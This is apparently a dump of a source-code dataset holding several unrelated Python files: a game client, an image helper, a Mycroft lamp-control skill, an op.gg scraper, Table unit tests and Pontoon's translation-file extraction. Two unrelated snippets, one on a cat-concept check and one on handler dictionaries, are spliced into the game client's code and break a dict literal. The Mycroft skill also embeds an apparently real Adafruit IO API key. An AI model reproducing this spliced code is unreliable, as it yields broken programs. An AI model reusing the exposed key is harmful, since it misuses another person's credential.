MessageType.room_choice:\n units = turn_data[\"units\"]\n options = turn_data[\"options\"]\n options = { int(k):v for k, v in options.items() }\n direction = self.player_client.room_choice(units, options)\n return { \"message_type\": MessageType.room_choice, \"choice\": 
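The concept scan in img_has_cat is easiest to get right with any(), which keeps looking past the first non-cat concept. The response dict below only imitates the shape the code expects; it is fabricated sample data, not real API output:

```python
result = {'outputs': [{'data': {'concepts': [
    {'name': 'animal', 'value': 0.99},
    {'name': 'cat', 'value': 0.97},
]}}]}

concepts = result['outputs'][0]['data']['concepts']
print(any(item['name'] == 'cat' for item in concepts))  # True
```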
direction }\n\n elif turn_data[\"message_type\"] == MessageType.combat_round:\n monster = turn_data[\"monster\"]\n units = turn_data[\"units\"]\n self.player_client.combat_round(monster, units)\n return { \"message_type\": MessageType.combat_round, \"units\": units }\n\n elif turn_data[\"message_type\"] == MessageType.trap_round:\n trap = turn_data[\"trap\"]\n units = turn_data[\"units\"]\n self.player_client.trap_round(trap, units)\n return {\"message_type\": MessageType.trap_round, \"units\": units}\n\n def send(self, data):\n self._socket_client.send(data)\n\n def notify_game_started(self):\n if self.verbose:\n print(\"Game Started\")\n self.started_game = True\n\n def deserialize(self, turn_data):\n\n # load units\n units = []\n if \"units\" in turn_data:\n for u in turn_data[\"units\"]:\n new_unit = get_unit(u[\"unit_class\"])\n new_unit.from_dict(u)\n units.append(new_unit)\n\n turn_data[\"units\"] = units\n\n # load message type specific data\n if turn_data[\"message_type\"] == MessageType.room_choice:\n # deserialize rooms\n for direction, room in turn_data[\"options\"].items():\n new_room = get_node(room[\"node_type\"])\n new_room.from_dict(room)\n turn_data[\"options\"][direction] = new_room\n\n elif turn_data[\"message_type\"] == MessageType.combat_round:\n # deserialize monster\n monster = get_monster(turn_data[\"monster\"][\"monster_type\"])\n monster.from_dict(turn_data[\"monster\"])\n turn_data[\"monster\"] = monster\n\n elif turn_data[\"message_type\"] == MessageType.trap_round:\n # deserialize trap\n trap = get_trap(turn_data[\"trap\"][\"trap_type\"])\n trap.from_dict(turn_data[\"trap\"])\n turn_data[\"trap\"] = trap\n\n return turn_data\n\n def serialize(self, turn_result):\n\n if turn_result[\"message_type\"] == MessageType.combat_round:\n serialized_units = []\n\n for u in turn_result[\"units\"]:\n serialized_units.append( u.to_dict() )\n\n turn_result[\"units\"] = serialized_units\n\n elif turn_result[\"message_type\"] == MessageType.trap_round:\n serialized_units = []\n\n for u in turn_result[\"units\"]:\n serialized_units.append( u.to_dict() )\n\n turn_result[\"units\"] = serialized_units\n\n\n return turn_result\n\n def notify_game_over(self):\n if callable(getattr(self.player_client, \"game_over\", None)):\n self.player_client.game_over()\n\n if self.quit_on_game_over:\n exit()\n\n\n\n","sub_path":"game/client/client_logic.py","file_name":"client_logic.py","file_ext":"py","file_size_in_byte":6057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"408732052","text":"from .._tier0 import Image\n\ndef imshow(image : Image, title : str = None, labels : bool = False, min_display_intensity : float = None, max_display_intensity : float = None, color_map = None, plot = None):\n from .._tier0 import pull\n from .._tier1 import maximum_z_projection\n\n if len(image.shape) == 3:\n image = maximum_z_projection(image)\n\n image = pull(image)\n\n cmap = color_map\n if labels:\n import matplotlib\n import numpy as np\n \n lut = np.random.rand ( 256,3)\n lut[0,:] = 0\n cmap = matplotlib.colors.ListedColormap ( lut )\n\n if plot is None:\n import matplotlib.pyplot as plt\n plt.imshow(image, cmap=cmap, vmin=min_display_intensity, vmax=max_display_intensity, interpolation='nearest')\n plt.show()\n else:\n plot.imshow(image, cmap=cmap, vmin=min_display_intensity, vmax=max_display_intensity, 
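ClientLogic.turn dispatches on message_type with an if/elif chain; a dictionary of handlers is a common alternative. A minimal sketch with hypothetical handler names, not the game's real API:

```python
def handle_town(turn_data):
    return {'message_type': 'town', 'purchases': []}

def handle_combat_round(turn_data):
    return {'message_type': 'combat_round', 'units': turn_data['units']}

HANDLERS = {
    'town': handle_town,
    'combat_round': handle_combat_round,
}

def turn(turn_data):
    # A KeyError on unknown types makes protocol mismatches loud.
    return HANDLERS[turn_data['message_type']](turn_data)

print(turn({'message_type': 'combat_round', 'units': ['knight']}))
```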
interpolation='nearest')\n\n","sub_path":"pyclesperanto_prototype/_tier9/_imshow.py","file_name":"_imshow.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"299445863","text":"import sys\nfrom mycroft import MycroftSkill, intent_file_handler\nfrom Adafruit_IO import MQTTClient\n\nADAFRUIT_IO_KEY = 'aio_zaSA378nNDu9vnMPcq5IpcfBWyNn'\nADAFRUIT_IO_USERNAME = 'Kenzo16'\n\nclient = MQTTClient(ADAFRUIT_IO_USERNAME, ADAFRUIT_IO_KEY)\nclient.connect()\nclient.loop_background()\n\n\nclass Lamb1Control(MycroftSkill):\n    def __init__(self):\n        MycroftSkill.__init__(self)\n    @intent_file_handler('lamb1.control.intent')\n    def handle_jarvis_introducing(self, message):\n        self.speak_dialog('lamb1.control')\n        client.publish('Lamb1', 1)\n\n\ndef create_skill():\n    return Lamb1Control()\n\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"166770516","text":"from bs4 import BeautifulSoup\nimport requests\n\n\nuserName = 'C9 Meteos'# crakyjoes, C9 Meteos, C9 Sneaky\nuserName = userName.replace(\" \", \"+\") # convention used by the website\nopGGUrl = 'http://na.op.gg/summoner/userName=' + userName\nwebHandle = requests.get(opGGUrl) # this is in bytes\ndecodeHtml = webHandle.content.decode(\"utf-8\", \"ignore\") #removes unnecessary unicode symbols\nsoup = BeautifulSoup(decodeHtml, \"html5lib\") #build a bs4 tag tree using the html5lib parser\n\n#print (dir(soup))\n#print (decodeHtml)\n#print (webHandle.text)\n\n\n#Gathering stats of \ngameList = soup.find_all(\"div\", class_=\"GameItemWrap\")\nfor gNum in range (0,len(gameList)):\n#gNum = 8\n    gameType = (gameList[gNum].find(\"div\", class_=\"GameType\")).string\n    gameResult = (gameList[gNum].find(\"div\", class_=\"GameResult\")).string.strip()\n    gameLength = (gameList[gNum].find(\"div\", class_=\"GameLength\")).string.strip()\n    championPlayed = (gameList[gNum].find(\"div\", class_=\"ChampionName\")).a.string.strip()\n    kills = int((gameList[gNum].find(\"span\", class_=\"Kill\")).string.strip())\n    deaths = int((gameList[gNum].find(\"span\", class_=\"Death\")).string.strip())\n    assists = int((gameList[gNum].find(\"span\", class_=\"Assist\")).string.strip())\n    csNums = (gameList[gNum].find(\"span\", class_=\"CS tip\")).string.strip()\n    gameDate = (gameList[gNum].find(\"div\", class_=\"TimeStamp\")).string.strip()\n    killPart = (gameList[gNum].find(\"div\", class_=\"CKRate\")).string.strip()\n    summonerSpells = (gameList[gNum].find_all(\"div\", class_=\"Spell\"))\n\n    if(deaths == 0):\n        KDA = (kills + assists)/(deaths+1)\n    else:\n        KDA = (kills + assists)/(deaths)\n\n    try:\n        multikill = (gameList[gNum].find(\"div\", class_=\"MultiKill\")).span.string.strip()\n    except:\n        multikill = \"None\"\n\n#Create a list of 2 teams\n    playersHTMLList = (gameList[gNum].find_all(\"div\", class_=\"Team\"))\n    teamsCombined = []\n    team = []\n\n    for i in range(0, len(playersHTMLList)):\n        summoners = playersHTMLList[i].find_all(\"div\", class_=\"Summoner\")\n        for player in summoners: #extract 2 teams separately\n            team.append(player.div.div.string)\n\n        teamsCombined.append(team) #[list_of_team1, list_of_team2]\n        team = [] #empty this list to re-use it to fill players from team 2\n\n\n    #Print the gathered information\n    print (\"Game-Number: \", gNum+1)\n    print (\"GameType: \", gameType)\n    print (\"GameResult: \", gameResult)\n    print (\"GameLength: \", 
gameLength)\n print (\"championPlayed: \", championPlayed)\n print (\"Kill: \", kills)\n print (\"Death: \", deaths)\n print (\"Assist: \", assists)\n print (\"KDA: \", \"{0:.3f}\".format(KDA))\n print (\"csNums :\", csNums)\n print (\"MultiKill: \", multikill)\n print (\"GameDate: \", gameDate)\n print (\"SummonerSpells: \", summonerSpells[0].img['alt'], summonerSpells[1].img['alt'])\n print (\"Kill Participation: \", killPart)\n print (\"TeamList: \", teamsCombined)\n print (\"--------------------------------------------------\")\n","sub_path":"opGG/py3opGG.py","file_name":"py3opGG.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"260654057","text":"import unittest\nfrom collections import OrderedDict\nfrom mock import Mock\n\nfrom malcolm.core import Table\nfrom malcolm.modules.builtin.vmetas import NumberArrayMeta, StringArrayMeta\n\n\nclass TestTableInit(unittest.TestCase):\n def test_init(self):\n meta = Mock()\n s = StringArrayMeta()\n meta.elements = {\"e1\":s, \"e2\":s, \"e3\":s}\n t = Table(meta)\n assert () == t.e1\n assert () == t.e2\n assert () == t.e3\n assert \"malcolm:core/Table:1.0\" == t.typeid\n\n def test_init_with_dict(self):\n meta = Mock()\n meta.elements = {\"e1\": NumberArrayMeta(\"int32\"),\n \"e2\": StringArrayMeta(),\n \"e3\": StringArrayMeta()}\n d = {\"e1\":[0, 1], \"e3\":[\"value\"]}\n t = Table(meta, d)\n assert [0, 1] == list(t.e1)\n assert () == t.e2\n assert (\"value\",) == t.e3\n assert \"malcolm:core/Table:1.0\" == t.typeid\n\n def test_init_with_none(self):\n meta = Mock()\n meta.elements = {\"e1\": StringArrayMeta()}\n t = Table(meta, None)\n assert () == t.e1\n assert \"malcolm:core/Table:1.0\" == t.typeid\n\n\nclass TestTableRowOperations(unittest.TestCase):\n def setUp(self):\n meta = Mock()\n meta.elements = OrderedDict()\n meta.elements[\"e1\"] = NumberArrayMeta(\"int32\")\n meta.elements[\"e2\"] = NumberArrayMeta(\"int32\")\n meta.elements[\"e3\"] = NumberArrayMeta(\"int32\")\n self.t = Table(meta)\n self.t.e1 = [1]\n self.t.e2 = [2]\n self.t.e3 = [3]\n\n def test_row_access(self):\n assert [1, 2, 3] == self.t[0]\n\n def test_string_access(self):\n assert self.t.e1 == self.t[\"e1\"]\n assert self.t.e2 == self.t[\"e2\"]\n\n def test_string_setters(self):\n self.t[\"e2\"] = [4]\n assert list(self.t.e2) == [4]\n\n def test_row_access_index_error(self):\n with self.assertRaises(IndexError):\n self.t[1]\n self.t.e1 = [1, 11]\n self.t.e2 = [2, 12]\n self.t.e3 = [3, 13]\n self.t[1]\n with self.assertRaises(IndexError):\n self.t[2]\n\n def test_row_assignment(self):\n self.t[0] = [7, 8, 9]\n assert [7] == self.t.e1\n assert [8] == self.t.e2\n assert [9] == self.t.e3\n\n def test_row_assignment_bad_row_raises(self):\n with self.assertRaises(ValueError):\n self.t[0] = [7, 8]\n assert [1] == self.t.e1\n assert [2] == self.t.e2\n assert [3] == self.t.e3\n\n def test_row_assingment_index_error(self):\n with self.assertRaises(IndexError):\n self.t[1] = [7, 8, 9]\n\n def test_row_append(self):\n self.t.append([11, 12, 13])\n self.t.append([21, 22, 23])\n assert [1, 11, 21] == list(self.t.e1)\n assert [2, 12, 22] == list(self.t.e2)\n assert [3, 13, 23] == list(self.t.e3)\n\n def test_row_append_bad_row_raises(self):\n with self.assertRaises(ValueError):\n self.t.append([11, 12])\n with self.assertRaises(ValueError):\n self.t.append([11, 12, 13, 14])\n\n def test_bad_columns_raise(self):\n self.t.e1 = [1, 2]\n with self.assertRaises(AssertionError):\n self.t[0]\n 
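The op.gg scraper above calls .string.strip() directly on every .find() result, which raises AttributeError as soon as a tag is missing. A guarded helper (text_of is hypothetical) returns None instead; html.parser keeps the sketch dependency-light:

```python
from bs4 import BeautifulSoup

html = '<div class="GameItemWrap"><div class="GameType">Ranked Solo</div></div>'
soup = BeautifulSoup(html, 'html.parser')

def text_of(node, cls):
    tag = node.find('div', class_=cls)
    return tag.string.strip() if tag and tag.string else None

game = soup.find('div', class_='GameItemWrap')
print(text_of(game, 'GameType'))    # 'Ranked Solo'
print(text_of(game, 'GameResult'))  # None rather than AttributeError
```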
with self.assertRaises(AssertionError):\n self.t[0] = [0, 0, 0]\n with self.assertRaises(AssertionError):\n self.t.append([0, 0, 0])\n\n\nclass TestTableMetaSerialization(unittest.TestCase):\n\n def setUp(self):\n meta = Mock()\n meta.elements = OrderedDict()\n meta.elements[\"e1\"] = StringArrayMeta()\n meta.elements[\"e2\"] = NumberArrayMeta(\"int32\")\n meta.elements[\"e3\"] = NumberArrayMeta(\"int32\")\n self.meta = meta\n\n def test_to_dict(self):\n t = Table(self.meta)\n t.e1 = [\"value\"]\n t.e2 = [1, 2]\n t.e3 = [0]\n\n expected = OrderedDict()\n expected[\"typeid\"] = \"malcolm:core/Table:1.0\"\n expected[\"e1\"] = [\"value\"]\n expected[\"e2\"] = [1, 2]\n expected[\"e3\"] = [0]\n actual = t.to_dict()\n # numpy compare gets in the way...\n for k, v in actual.items():\n if k != \"typeid\":\n actual[k] = list(v)\n assert expected == actual\n\n def test_from_dict(self):\n d = {\"e2\":[0, 1, 2], \"e1\":[\"value\"], \"e3\":[6, 7]}\n t = Table(self.meta, d)\n assert self.meta == t.meta\n assert [0, 1, 2] == list(t.e2)\n assert (\"value\",) == t.e1\n assert [6, 7] == list(t.e3)\n\n def test_dict_roundtrip(self):\n t = Table(self.meta)\n d = t.to_dict()\n d2 = d.copy()\n d2.pop(\"typeid\")\n t2 = Table(self.meta, d2)\n assert d == t2.to_dict()\n","sub_path":"tests/test_core/test_table.py","file_name":"test_table.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"388785260","text":"\nimport codecs\nimport commonware.log\nimport configparser\nimport datetime\nimport fnmatch\nimport operator\nimport os\nimport polib\nimport shutil\nimport silme.core\nimport silme.format.properties\nimport StringIO\nimport urllib2\nimport zipfile\n\nfrom django.conf import settings\nfrom django.utils.encoding import smart_text\nfrom pontoon.administration.utils.vcs import update_from_vcs\n\nfrom pontoon.base.models import (\n Entity,\n Locale,\n Project,\n ProjectForm,\n Resource,\n Stats,\n Subpage,\n Translation,\n UserProfile,\n get_translation,\n unset_approved,\n update_stats,\n)\n\nlog = commonware.log.getLogger('pontoon')\n\n\n\"\"\" Start monkeypatching \"\"\"\nfrom silme.core.structure import Structure, Comment\nfrom silme.format.properties.parser import PropertiesParser\n\n\n@classmethod\ndef split_comments_mine(\n cls, text, object, code='default', pointer=0, end=None):\n pattern = cls.patterns['comment']\n if end:\n match = pattern.search(text, pointer, end)\n else:\n match = pattern.search(text, pointer)\n while match:\n st0 = match.start(0)\n if st0 > pointer:\n cls.split_entities(\n text, object, code=code, pointer=pointer, end=st0)\n groups = match.groups()\n comment = silme.core.structure.Comment(\n match.group(0)[1:].replace('\\n#', '\\n'))\n object.append(comment)\n pointer = match.end(0)\n if end:\n match = pattern.search(text, pointer, end)\n else:\n match = pattern.search(text, pointer)\n if (not end or (end > pointer)) and len(text) > pointer:\n cls.split_entities(text, object, code=code, pointer=pointer)\n\nPropertiesParser.split_comments = split_comments_mine\n\n\ndef __repr__mine(self):\n string = ''\n for i in self:\n string += str(i)\n return string\n\nComment.__repr__ = __repr__mine\n\n\ndef modify_entity_mine(self, id, value, code=None):\n \"\"\"\n modifies entity value; supports duplicate keys\n code - if given modified the value for given locale code\n \"\"\"\n found = False\n for item in self:\n if isinstance(item, silme.core.entity.Entity) and item.id == id:\n 
item.set_value(value, code)\n found = True\n\n if found:\n return True\n else:\n raise KeyError('No such entity')\n\nStructure.modify_entity = modify_entity_mine\n\"\"\" End monkeypatching \"\"\"\n\n\ndef get_locale_paths(project, locale):\n \"\"\"Get paths to locale files.\"\"\"\n\n locale_paths = []\n path = get_locale_directory(project, locale)[\"path\"]\n\n for root, dirnames, filenames in os.walk(path):\n # Ignore hidden files and folders\n filenames = [f for f in filenames if not f[0] == '.']\n dirnames[:] = [d for d in dirnames if not d[0] == '.']\n\n for filename in fnmatch.filter(filenames, '*.' + project.format):\n locale_paths.append(os.path.join(root, filename))\n\n return locale_paths\n\n\ndef get_locale_directory(project, locale):\n \"\"\"\n Get path to the directory with locale files.\n\n Args:\n project: Project instance\n locale: Locale instance\n Returns:\n Dict with directory name and path as keys.\n \"\"\"\n\n path = get_repository_path_master(project)\n\n for root, dirnames, filenames in os.walk(path):\n # Ignore hidden files and folders\n filenames = [f for f in filenames if not f[0] == '.']\n dirnames[:] = [d for d in dirnames if not d[0] == '.']\n\n for dirname in fnmatch.filter(dirnames, locale.code):\n return {\n 'name': dirname,\n 'path': os.path.join(root, dirname),\n }\n\n # Also check for locale variants with underscore, e.g. de_AT\n for dirname in fnmatch.filter(dirnames, locale.code.replace('-', '_')):\n return {\n 'name': dirname,\n 'path': os.path.join(root, dirname),\n }\n\n # Projects not using locale directories (.ini, file)\n if project.format == 'ini' or project.repository_type == 'file':\n return {\n 'name': '',\n 'path': path,\n }\n\n log.error(\"Locale repository path not found.\")\n\n\ndef detect_format(path):\n \"\"\"Detect file format based on file extensions.\"\"\"\n\n for root, dirnames, filenames in os.walk(path):\n # Ignore hidden files and folders\n filenames = [f for f in filenames if not f[0] == '.']\n dirnames[:] = [d for d in dirnames if not d[0] == '.']\n\n for extension in ('pot', 'po', 'properties', 'ini', 'lang'):\n for filename in fnmatch.filter(filenames, '*.' + extension):\n return 'po' if extension == 'pot' else extension\n\n\ndef get_source_paths(path):\n \"\"\"Get paths to source files.\"\"\"\n\n source_paths = []\n\n for root, dirnames, filenames in os.walk(path):\n # Ignore hidden files and folders\n filenames = [f for f in filenames if not f[0] == '.']\n dirnames[:] = [d for d in dirnames if not d[0] == '.']\n\n for extension in ('pot', 'po', 'properties', 'ini', 'lang'):\n for filename in fnmatch.filter(filenames, '*.' 
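The os.walk/fnmatch idiom repeated throughout files.py, shown in isolation: pruning dirnames in place stops os.walk from descending into hidden folders, and fnmatch collects files by extension.

```python
import fnmatch
import os

def find_files(root_dir, extension):
    matches = []
    for root, dirnames, filenames in os.walk(root_dir):
        filenames = [f for f in filenames if not f[0] == '.']
        # Slice assignment mutates the list os.walk iterates, pruning descent.
        dirnames[:] = [d for d in dirnames if not d[0] == '.']
        for filename in fnmatch.filter(filenames, '*.' + extension):
            matches.append(os.path.join(root, filename))
    return matches

print(find_files('.', 'py'))
```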
+ extension):\n                source_paths.append(os.path.join(root, filename))\n\n    return source_paths\n\n\ndef get_source_directory(path):\n    \"\"\"Get name and path of the directory with source files.\"\"\"\n\n    for root, dirnames, filenames in os.walk(path):\n        # Ignore hidden files and folders\n        filenames = [f for f in filenames if not f[0] == '.']\n        dirnames[:] = [d for d in dirnames if not d[0] == '.']\n\n        for directory in ('templates', 'en-US', 'en-GB', 'en'):\n            for dirname in fnmatch.filter(dirnames, directory):\n                source_directory_path = os.path.join(root, dirname)\n                if detect_format(source_directory_path):\n                    return {\n                        'name': dirname,\n                        'path': source_directory_path,\n                    }\n\n    # Projects not using locale directories (.ini, file)\n    return {\n        'name': '',\n        'path': path,\n    }\n\n\ndef get_repository_path_master(project):\n    \"\"\"Get path to master project folder containing repository files.\"\"\"\n\n    return os.path.join(\n        settings.MEDIA_ROOT, project.repository_type, project.slug)\n\n\ndef get_relative_path(path, locale):\n    \"\"\"Get relative path to repository file.\"\"\"\n\n    locale_directory = locale.code\n    if 'templates' in path:\n        locale_directory = 'templates'\n\n    # Also check for locale variants with underscore, e.g. de_AT\n    underscore = locale.code.replace('-', '_')\n    if '/' + underscore + '/' in path:\n        locale_directory = underscore\n\n    return path.split('/' + locale_directory + '/')[-1]\n\n\ndef save_entity(resource, string, string_plural=\"\", comment=\"\",\n                key=\"\", source=\"\"):\n    \"\"\"Admin interface: save new or update existing entity in DB.\"\"\"\n\n    # Update existing entity\n    try:\n        if key == \"\":\n            e = Entity.objects.get(\n                resource=resource, string=string,\n                string_plural=string_plural)\n\n        else:\n            e = Entity.objects.get(resource=resource, key=key)\n            e.string = string\n            e.string_plural = string_plural\n\n        e.source = source\n\n        # Set obsolete attribute for all updated entities to False\n        e.obsolete = False\n\n    # Add new entity\n    except Entity.DoesNotExist:\n        e = Entity(resource=resource, string=string,\n                   string_plural=string_plural, key=key, source=source)\n\n    if len(comment) > 0:\n        e.comment = comment\n\n    e.save()\n\n\ndef save_translation(entity, locale, string, plural_form=None, fuzzy=False):\n    \"\"\"Admin interface: save new or update existing translation in DB.\"\"\"\n\n    approved = not fuzzy\n    translations = Translation.objects.filter(\n        entity=entity, locale=locale, plural_form=plural_form)\n    translations_equal = translations.filter(string=string)\n    translations_equal_count = translations_equal.count()\n\n    # Save new translation if it doesn't exist yet\n    if translations_equal_count == 0:\n        unset_approved(translations)\n        t = Translation(\n            entity=entity, locale=locale, plural_form=plural_form,\n            string=string, date=datetime.datetime.now(),\n            approved=approved, fuzzy=fuzzy)\n        t.save(stats=False)\n\n    # Update existing translations if fuzzy status changes\n    elif translations_equal_count > 0:\n        t = translations_equal[0]\n        if translations_equal_count > 1:\n            try:\n                t = translations_equal.get(approved=True)\n            except Translation.DoesNotExist:\n                t = translations_equal.latest(\"date\")\n\n        if t.fuzzy != fuzzy:\n            unset_approved(translations)\n            t.date = datetime.datetime.now()\n            t.approved = approved\n            t.fuzzy = fuzzy\n            t.save(stats=False)\n\n\ndef update_entity_count(resource, project):\n    \"\"\"Save number of non-obsolete entities for a given resource.\"\"\"\n    entities = Entity.objects.filter(resource=resource, obsolete=False)\n    resource.entity_count = entities.count()\n    
resource.save()\n\n # Also make sure resource-locale Stats object exists\n for locale in project.locales.all():\n s, c = Stats.objects.get_or_create(resource=resource, locale=locale)\n\n\ndef parse_lang(path):\n \"\"\"Parse a dotlang file and return a dict of translations.\"\"\"\n trans = {}\n\n if not os.path.exists(path):\n return trans\n\n with codecs.open(path, 'r', 'utf-8', errors='replace') as lines:\n source = None\n comment = ''\n tags = []\n counter = 0\n\n for line in lines:\n line = line.strip()\n if not line:\n continue\n\n if line[0] == '#' and line[1] != '#':\n comment = line.lstrip('#').strip()\n continue\n\n if line[0] == ';':\n source = line[1:]\n\n elif source:\n for tag in ('{ok}', '{l10n-extra}'):\n if line.lower().endswith(tag):\n line = line[:-len(tag)]\n tags.append(tag)\n line = line.strip()\n trans[source] = [counter, comment, line, tags]\n comment = ''\n tags = []\n counter += 1\n\n # Sort by counter\n trans = sorted(trans.iteritems(), key=operator.itemgetter(1))\n return trans\n\n\ndef extract_po(project, locale, paths, entities=False):\n \"\"\"Extract .po (gettext) files from paths and save or update in DB.\"\"\"\n\n for path in paths:\n try:\n po = polib.pofile(path)\n escape = polib.escape\n\n relative_path = get_relative_path(path, locale)\n if relative_path[-1] == 't':\n relative_path = relative_path[:-1]\n\n resource, created = Resource.objects.get_or_create(\n project=project, path=relative_path)\n\n if entities:\n for entry in po:\n if not entry.obsolete:\n save_entity(resource=resource,\n string=escape(entry.msgid),\n string_plural=escape(entry.msgid_plural),\n comment=entry.comment,\n source=entry.occurrences)\n\n update_entity_count(resource, project)\n\n else:\n for entry in (po.translated_entries() + po.fuzzy_entries()):\n if not entry.obsolete:\n\n # Entities without plurals\n if len(escape(entry.msgstr)) > 0:\n try:\n e = Entity.objects.get(\n resource=resource,\n string=escape(entry.msgid))\n save_translation(\n entity=e,\n locale=locale,\n string=escape(entry.msgstr),\n fuzzy='fuzzy' in entry.flags)\n\n except Entity.DoesNotExist:\n continue\n\n # Pluralized entities\n elif len(entry.msgstr_plural) > 0:\n try:\n e = Entity.objects.get(\n resource=resource,\n string=escape(entry.msgid))\n for k in entry.msgstr_plural:\n save_translation(\n entity=e,\n locale=locale,\n string=escape(entry.msgstr_plural[k]),\n plural_form=k,\n fuzzy='fuzzy' in entry.flags)\n\n except Entity.DoesNotExist:\n continue\n\n update_stats(resource, locale)\n\n log.debug(\"[\" + locale.code + \"]: \" + path + \" saved to DB.\")\n except Exception as e:\n log.critical('PoExtractError for %s: %s' % (path, e))\n\n\ndef extract_properties(project, locale, paths, entities=False):\n \"\"\"Extract .properties files from paths and save or update in DB.\"\"\"\n\n parser = silme.format.properties.PropertiesFormatParser\n\n for path in paths:\n try:\n f = open(path)\n structure = parser.get_structure(f.read())\n\n comment = \"\"\n relative_path = get_relative_path(path, locale)\n resource, created = Resource.objects.get_or_create(\n project=project, path=relative_path)\n\n for obj in structure:\n if isinstance(obj, silme.core.entity.Entity):\n if entities:\n save_entity(resource=resource, string=obj.value,\n key=obj.id, comment=comment)\n comment = \"\"\n else:\n try:\n e = Entity.objects.get(\n resource=resource,\n key=obj.id)\n save_translation(\n entity=e,\n locale=locale,\n string=obj.value)\n\n except Entity.DoesNotExist:\n continue\n\n elif isinstance(obj, 
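extract_po leans on polib's entry classification; a self-contained round trip of the same kind, assuming polib's documented acceptance of raw .po content in place of a path (the catalog below is made up):

```python
import polib

PO_TEXT = '''
msgid "Hello"
msgstr "Bonjour"

#, fuzzy
msgid "Bye"
msgstr "Salut"
'''

po = polib.pofile(PO_TEXT)
for entry in po.translated_entries():
    print('translated:', entry.msgid, '->', entry.msgstr)
for entry in po.fuzzy_entries():
    print('fuzzy:', entry.msgid, '->', entry.msgstr)
```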
silme.core.structure.Comment):\n if entities:\n comment = str(obj)\n\n if entities:\n update_entity_count(resource, project)\n else:\n update_stats(resource, locale)\n\n log.debug(\"[\" + locale.code + \"]: \" + path + \" saved to DB.\")\n f.close()\n except IOError:\n log.debug(\"[\" + locale.code + \"]: \" +\n path + \" doesn't exist. Skipping.\")\n\n\ndef extract_lang(project, locale, paths, entities=False):\n \"\"\"Extract .lang files from paths and save or update in DB.\"\"\"\n\n for path in paths:\n lang = parse_lang(path)\n relative_path = get_relative_path(path, locale)\n\n resource, created = Resource.objects.get_or_create(\n project=project, path=relative_path)\n\n if entities:\n for key, value in lang:\n save_entity(resource=resource, string=key,\n comment=value[1])\n\n update_entity_count(resource, project)\n\n else:\n for key, value in lang:\n if key != value[2] or '{ok}' in value[3]:\n try:\n e = Entity.objects.get(resource=resource, string=key)\n save_translation(\n entity=e, locale=locale, string=value[2])\n\n except Entity.DoesNotExist:\n continue\n\n update_stats(resource, locale)\n\n log.debug(\"[\" + locale.code + \"]: \" + path + \" saved to DB.\")\n\n\ndef extract_ini(project, path):\n \"\"\"Extract .ini file from path and save or update in DB.\"\"\"\n\n config = configparser.ConfigParser()\n with codecs.open(path, 'r', 'utf-8') as f:\n try:\n config.read_file(f)\n except Exception as e:\n log.debug(\"INI configparser: \" + str(e))\n\n sections = config.sections()\n\n source_locale = None\n for s in ('templates', 'en-US', 'en-GB', 'en'):\n if s in sections:\n source_locale = s\n break\n if source_locale is None:\n log.error(\"Unable to detect source locale\")\n raise Exception(\"error\")\n\n # Move source locale on top, so we save entities first, then translations\n sections.insert(0, sections.pop(sections.index(source_locale)))\n\n resource, created = Resource.objects.get_or_create(\n project=project, path=path)\n\n for section in sections:\n try:\n locale = Locale.objects.get(code=section)\n except Locale.DoesNotExist:\n log.debug(\"Locale not supported: \" + section)\n break\n\n for item in config.items(section):\n if section == source_locale:\n save_entity(resource=resource, string=item[1],\n key=item[0])\n else:\n try:\n e = Entity.objects.get(\n resource=resource, key=item[0])\n save_translation(\n entity=e, locale=locale, string=item[1])\n except Entity.DoesNotExist:\n log.debug(\"[\" + section + \"]: line ID \" +\n item[0] + \" is obsolete.\")\n continue\n\n if section == source_locale:\n update_entity_count(resource, project)\n else:\n update_stats(resource, locale)\n\n log.debug(\"[\" + section + \"]: saved to DB.\")\n\n\ndef extract_to_database(project, locales=None):\n \"\"\"Extract data from project files and save or update in DB.\"\"\"\n log.debug(\"Extract data from project files and save or update in DB.\")\n\n repository_path_master = get_repository_path_master(project)\n source_directory = get_source_directory(repository_path_master)\n\n source_locale = 'en-US'\n if not source_directory['name'] in ('', 'templates'):\n source_locale = source_directory['name']\n\n if not locales:\n # Mark all existing project entities as obsolete\n resources = Resource.objects.filter(project=project)\n Entity.objects.filter(resource__in=resources).update(obsolete=True)\n\n locales = [Locale.objects.get(code=source_locale)]\n locales.extend(project.locales.all())\n\n isFile = project.repository_type == 'file'\n source_paths = 
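The section/item access pattern extract_ini uses, standalone; read_string substitutes for the file handle and the locale data is invented:

```python
import configparser

INI_TEXT = """
[en-US]
greeting = Hello
[fr]
greeting = Bonjour
"""

config = configparser.ConfigParser()
config.read_string(INI_TEXT)
for section in config.sections():
    for key, value in config.items(section):
        print(section, key, '=', value)
```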
get_source_paths(source_directory['path'])\n\n if project.format == 'ini':\n try:\n extract_ini(project, source_paths[0])\n except Exception as e:\n if isFile:\n os.remove(file_path)\n return\n\n for index, locale in enumerate(locales):\n if locale.code == source_locale:\n paths = source_paths\n entities = True\n else:\n paths = get_locale_paths(project, locale)\n entities = isFile\n globals()['extract_%s' % project.format](\n project, locale, paths, entities)\n\n\ndef update_from_repository(project, locales=None):\n \"\"\"\n Update project files from remote repository.\n\n Args:\n project: Project instance\n locales: List of Locale instances\n \"\"\"\n log.debug(\"Update project files from remote repository.\")\n\n repository_type = project.repository_type\n repository_url = project.repository_url\n repository_path = repository_path_master = \\\n get_repository_path_master(project)\n\n # If one-locale repo, set repository_url_master and update repository_path\n repository_url_master = False\n ending = os.path.basename(os.path.normpath(repository_url))\n\n if ending in ('templates', 'en-US', 'en-GB', 'en'):\n repository_url_master = repository_url.rsplit(ending, 1)[0]\n repository_path = os.path.join(repository_path_master, ending)\n\n # Save file to server\n if repository_type == 'file':\n\n u = urllib2.urlopen(repository_url)\n file_name = repository_url.rstrip('/').rsplit('/', 1)[1]\n file_path = os.path.join(repository_path_master, file_name)\n\n if not os.path.exists(repository_path_master):\n os.makedirs(repository_path_master)\n\n try:\n with open(file_path, 'w') as f:\n 